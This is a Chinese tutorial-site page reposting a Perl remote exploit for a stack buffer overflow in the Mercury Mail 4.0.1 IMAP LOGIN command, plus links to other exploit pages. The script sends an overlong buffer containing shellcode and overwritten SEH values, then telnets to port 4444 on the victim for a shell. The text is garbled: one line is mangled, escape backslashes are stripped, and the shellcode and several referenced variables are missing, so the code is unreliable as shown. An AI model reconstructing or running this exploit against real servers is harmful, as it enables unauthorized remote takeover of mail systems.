手机
当前位置:查字典教程网 >网络安全 >Exploit >Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
摘要:#!/usr/bin/perl##http://www.securityfocus.com/bid/11775#credittoMutsfo...

#!/usr/bin/perl

#

# http://www.securityfocus.com/bid/11775

# credit to Muts for this vulnerability

# acaro [at] jervus.it

use IO::Socket::INET;

use Switch;

if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);

$socket or die "Cannot connect to host!n";

recv($socket, $reply, 1024, 0);

print "Response:" . $reply;

send $socket, $request, 0;

print "[ ] Sent 1st requestn";

recv($socket, $reply, 1024, 0);

print "Response:" . $reply;

sleep(1);

my $request ="x41" x 255;

send $socket, $request, 0;

print "[ ] Sent 2nd requestn";

sleep(1);

my $request=("x45" x7420).("x90" x10).$happy.("x90" x14).$shellcode.("x41" x8).$nextseh.$seh.("x90" x5).$jmp.("x90" x533);

send $socket, $request, 0;

print "[ ] Sent final requestn";

sleep(1);

close($socket);

print " connect on port 4444 of $host ...n";

sleep(3);

system("telnet $host 4444");

exit;

//http://www.leftworld.net

【Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit】相关文章:

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

精品推荐
分类导航